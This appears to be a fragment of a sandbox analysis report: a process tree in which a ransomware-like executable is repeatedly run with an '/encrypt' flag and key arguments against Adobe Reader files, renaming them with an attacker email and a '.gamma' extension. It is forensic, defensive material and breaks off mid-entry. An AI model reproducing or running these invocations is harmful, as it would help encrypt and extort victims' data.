                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:5856
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:3368
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:5100
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:3480
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:3844
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:5456
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:4088
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:3520
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3768
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2680
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6580
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2604
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6576
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6844
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4408
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4740
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4164
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5980
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3708
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
